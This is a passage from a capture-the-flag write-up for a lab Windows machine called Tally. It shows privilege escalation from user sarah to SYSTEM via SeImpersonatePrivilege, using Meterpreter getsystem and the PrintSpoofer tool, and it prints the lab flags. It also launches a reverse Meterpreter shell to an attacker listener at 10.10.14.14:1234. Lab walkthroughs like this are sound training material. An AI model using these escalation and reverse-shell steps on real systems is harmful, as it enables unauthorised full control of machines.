Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
tally\sarah

C:\Windows\system32>type C:\users\sarah\desktop\user.txt
type C:\users\sarah\desktop\user.txt
cfa7b9ac1d957533f04e1ff7640e35fe

Privilege Escalation

Using meterpreter, we can check the privileges of the current user.

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege

The current user has SeImpersonatePrivilege, which indicates that we can most likely use getsystem to become Administrator.

meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).

meterpreter > shell
Process 1424 created.
Channel 3 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type C:\users\administrator\desktop\root.txt
type C:\users\administrator\desktop\root.txt
f70691131d9d11a4e9f510d0c6fcd1c9

Assuming that we do not have this “cheat code”, we can use PrintSpoofer to manually get Administrator.

❯ wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

meterpreter > upload PrintSpoofer64.exe C:/users/sarah/desktop
meterpreter > shell
Process 7108 created.
Channel 11 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\Sarah\Desktop

C:\Users\Sarah\Desktop>PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Alternatively, PrintSpoofer can be used to launch a reverse shell instead of an interactive cmd.

msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 5.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.14:1234 
msf6 exploit(multi/handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > shell
Process 5840 created.
Channel 12 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\users\sarah\desktop

C:\Users\Sarah\Desktop>PrintSpoofer64.exe -c "shell.exe"
[*] Sending stage (203846 bytes) to 10.10.10.59
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
[*] Meterpreter session 5 opened (10.10.14.14:1234 -> 10.10.10.59:49947)
^Z
Background channel 12? [y/N]  y
meterpreter > bg
[*] Backgrounding session 3...

msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                  Connection
  --  ----  ----                     -----------                  ----------
  3         meterpreter x64/windows  TALLY\Sarah @ TALLY          10.10.14.14:1234 -> 10.10.10.59:49787 (10.10.10.59)
  5         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ TALLY  10.10.14.14:1234 -> 10.10.10.59:49947 (10.10.10.59)

This post is licensed under CC BY 4.0 by the author.